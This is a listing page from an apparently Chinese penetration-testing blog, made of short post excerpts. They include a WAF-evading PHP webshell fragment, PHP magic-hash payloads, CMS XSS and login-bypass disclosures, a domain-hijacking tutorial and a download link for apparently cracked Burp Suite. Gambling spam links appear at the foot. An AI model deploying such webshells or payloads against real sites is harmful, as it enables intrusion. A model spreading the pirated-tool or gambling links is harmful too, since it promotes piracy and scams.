Burp1.7.26 永久版本

mOon    神器下载     534次查看    抢沙发    2017年12月09日

Burp1.7.26 永久版本 链接:https://pan.baidu.com/s/1eR3Myrg 密码:3fnb

过狗过云锁一句话

mOon    原创作品     466次查看    抢沙发    2017年12月08日

这几个月 没什么东西写 东西都是转载 哈哈哈 最近更新一些原创吧。 今天在群里面看到一些机油讨论一些话题。 看到一个据说是过狗过云锁的一句话。 <?php error_reporting(0);set_time_limit(0);$a=$_POST["x"];if($a){$a=str_replace(array(...

PHP 函数漏洞总结

mOon    渗透测试     628次查看    抢沙发    2017年11月29日

1.MD5 compare漏洞 PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 常见的payload有 0x01 md5(str)     QNKCDZO     2406...

PHP渗透中的奇淫技巧--检查相等时的漏洞

mOon    渗透测试     535次查看    抢沙发    2017年11月29日

PHP是现在网站中最为常用的后端语言之一,是一种类型系统 动态、弱类型的面向对象式编程语言。可以嵌入HTML文本中,是目前最流行的web后端语言之一,并且可以和Web Server 如apache和nginx方便的融合。目前,已经占据了服务端市场的极大占有量。 但是,弱类型,一些方便的特性由于新手程序员的不当使用,造成了一些漏洞,这篇文章就来介绍一下一些渗透中可以用的特性。 ...

鲶鱼CMS存储XSS漏洞披露

mOon    漏洞收集     995次查看    抢沙发    2017年11月19日

Catfish(鲶鱼) CMS是一款开源的PHP内容管理系统。这个cms是十月我和学长小胡子一起审计的。所以在这里声明下,洞是他找的,他不善言辞,授权给我来写文章。漏洞已提交给厂商,同意公开此漏洞。 XSS漏洞点 这里的版本是V4.6.0。出问题的地方是头像上传这个地方,这个cms以前爆过一枚任意文件删除漏洞也是这里。 先注册一个普通用户 ...

Masscan及Nmap实现对阿里云ECS的外网端口监控

mOon    渗透测试     924次查看    抢沙发    2017年11月18日

*本文原创作者:yuegui_2004,本文属于FreeBuf原创奖励计划,禁止转载 Nmap作为一个开源的互联网端口扫描及安全审计工具,大家并不陌生,许多系统及网络管理员利用它进行网络探测、端口扫描、端口服务管理等。但是在遇到大网段全端口范围的场景时,nmap的扫描能力就受到了限制,扫描周期长就成为了其弊端。 要实现外网端口监控,首先就要保证端口扫描的近实时性,对向...

C#实现多线程的方式:Task——任务

mOon    渗透编程     943次查看    抢沙发    2017年11月17日

C#实现多线程的方式:Task——任务 简介   .NET 4包含新名称空间System.Threading.Tasks,它 包含的类抽象出了线程功能。 在后台使用ThreadPool。 任务表示应完成的某个单元的工作。 这个单元的工作可以在单独的线程中运行,也可以以同步方式启动一个任务,这需要等待主调线程。 使用任务不仅可以获得一个抽象层,还可以对底...

国产ImXSS工具开源发布(附设计文档)

mOon    神器下载     1399次查看    抢沙发    2017年11月15日

 国产ImXSS工具开源发布(附设计文档) 一、前言 ImXSS是国内首套Java研发的Xss跨站脚本测试平台。ImXSS前身是XssAPP,秉承高效、快速、稳定、易用的原则。主要用于技术研究与交流. 二、业务说明 跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取...

Foosun DotNetCMS2.0登录绕过漏洞

mOon    漏洞收集     1152次查看    抢沙发    2017年11月14日

Foosun DotNetCMS2.0的源码下载地址:【传送门】 在阅读Foosun DotNetCMS2.0代码时,我们发现了这样一处: 具体细节为: 1.从${pre}_sys_User表中取出UserNum,UserName,SiteID ...

劫持域名的新思路

mOon    业界见闻     2085次查看    2条评论    2017年11月09日

Admin 王少QQ2609255576  基友博客:www.kmgjqz.cn更多教程请关注博客 域名劫持第一课 怎么查询whois 首先我们找到一个目标网站,首先就是查找他的whois 比如目标站是:setse.cn我们去站长之家查询whois 站长之家网站:www.chinaz.com ...

友情链接:万达招商  万达主管QQ  万达娱乐主管  万达主管QQ  万达娱乐开户  万达娱乐招商  万达登录  万达娱乐主管  万达开户  万达主管